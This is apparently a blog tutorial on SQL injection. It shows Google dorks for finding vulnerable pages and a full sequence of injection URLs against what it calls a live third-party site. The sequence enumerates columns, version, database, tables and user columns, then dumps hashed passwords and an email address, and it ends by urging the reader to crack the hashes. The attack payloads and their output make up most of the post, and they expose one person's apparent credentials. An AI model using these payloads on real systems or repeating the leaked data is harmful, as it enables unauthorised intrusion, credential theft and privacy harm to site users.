SQL injection attack consists of
"injection" of a SQL query via input data from the client to the
application. Through SQL injection attacker can read sensitive data, modify database,
act like as an Admin. SQL injection errors occur when data enters a program
from an untrusted source and the data used to dynamically construct a SQL
query.
How to find your target....
These are some google dork, you
can find more on google :)
inurl:index.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:pageid=
Now you found your target.
So whom are you waiting for go
and try SQL injection.. Don't Know :(
I explain.....
I am going to show you on live
website, but remember, this is only for knowledge purpose. Try only if you have
permission.
Here is my URL:
http://abcd.com.bn/cargo/whatsnew_details.php?id=32
First we will check that our URL
is vulnerable for SQL Injection or not. To do this we just insert a single
quote (') it will break backend query and in response show some SQL error. Lets find out...
http://abcd.com.bn/cargo/whatsnew_details.php?id=32'
Good! its showing SQL error means
we are on write track, SQL error is..
Error: Warning: mysql_fetch_array()
expects parameter 1 to be resource, boolean given in
/home/megali5/public_html/cargo/whatsnew_details.php on line 5
If it does not shows any error
then look for any changes on application like some content missing or image
missing. You can find easily.
For success full SQL injection
our task is to patch this error, for this we use "--+",
"--", # etc it depend on the backend query, it just comment the rest
query.
http://abcd.com.bn/cargo/whatsnew_details.php?id=32'--+
After patching error we will look
for, how many no of columns being used in the select statement,by using
"ORDER BY" clause.
ORDER BY :- Order by keyword is
used to sort the result by one or more columns.
http://abcd.com.bn/cargo/whatsnew_details.php?id=32'+ORDER
BY+1--+ (No error)
http://abcd.com.bn/cargo/whatsnew_details.php?id=32'+ORDER
BY+2--+ (No error)
http://abcd.com.bn/cargo/whatsnew_details.php?id=32'+ORDER
BY+3--+ (No error)
http://abcd.com.bn/cargo/whatsnew_details.php?id=32'+ORDER
BY+4--+ (No error)
.
.
.
http://abcd.com.bn/cargo/whatsnew_details.php?id=32'+ORDER
BY+6--+ (No error)
http://abcd.com.bn/cargo/whatsnew_details.php?id=32'+ORDER
BY+7--+ (Error)
On ORDER BY 7 it shows error like previous one...
Error: Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /home/megali5/public_html/cargo/whatsnew_details.php on line 5
Error: Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /home/megali5/public_html/cargo/whatsnew_details.php on line 5
This error means we will use
"6" columns in our select statement...
Now find out which columns number
are visible on web application by using UNION SELECT statement...
http://abcd.com.bn/cargo/whatsnew_details.php?id=32'+UNION+SELECT+1,2,3,4,5,6--+
Columns no "2" and "4" are visible on web application, these columns are our target..
Some time it does not shows any columns. No need to
panic.. Just add "-" before id parameter value. ex.
http://abcd.com.bn/cargo/whatsnew_details.php?id=-32'+UNION+SELECT+1,2,3,4,5,6--+
First we look for version, for
this we will use "@@version"...
http://abcd.com.bn/cargo/whatsnew_details.php?id=32'+UNION+SELECT+ 1,@@version,3,4,5,6--+
Version :- 5.6.21-log
Now database name for we use
"database()"....
http://abcd.com.bn/cargo/whatsnew_details.php?id=32'+UNION+SELECT+1,database(),3,4,5,6--+
Database Name :- megali5_cargo
Time for iterating table name, for
this we use "information_schema"..
According to wikipedia
INFORMATION_SCHEMA is a database within each MySQL instance, the place that
stores information about all the other databases that the MySQL server
maintains.
Query is...
http://abcd.com.bn/cargo/whatsnew_details.php?id=32'+UNION+SELECT +1,group_concat(table_name),3,4,5,6+from+information_schema.tables+where+ table_schema=database()--+
You will be thinking about
group_concate function, the GROUP_CONCAT function concatenates strings from a
group into one string with various options.
Tables Name :-
g2_PendingUser,
g2_PermalinksMap,
g2_PermissionSetMap,
g2_PhotoItem,
g2_PluginMap,
g2_PluginPackageMap
Look for interesting table, here
we found "g2_PendingUser"
After table we iterate columns,
http://abcd.com.bn/cargo/whatsnew_details.php?id=32'+UNION+SELECT
+1,group_concat(column_name),3,4,5,6+from+information_schema.columns+where+
table_name='g2_PendingUser'--+
Columns Name :-
g_id,g_userName,
g_fullName,
g_hashedPassword,
g_email,
g_language,
g_registrationKey
Here you are seeing some
lucrative columns, yes! you are right "g_email and g_hashedPassword".
Now its time for email id and
password.
http://abcd.com.bn/cargo/whatsnew_details.php?id=32'+UNION+SELECT
+1,group_concat(
g_hashedPassword,0x2d,0x2d,g_email),3,4,5,6+from+g2_PendingUser--+
g_hashedPassword,0x2d,0x2d,g_email),3,4,5,6+from+g2_PendingUser--+
here 0x2d is hex value of
"-"
Here is your email id and
password...
JSh]4dbb33835fb01c9a775f7745911fd44e--she_sell@hotmail.com,
7ZW\8eaee83ba12b12856b3ea9066dcefccf--she_sell@hotmail.com
But you are not so lucky as you
thought, password are in hash formate :(. Go and crack the hash.
No comments:
Post a Comment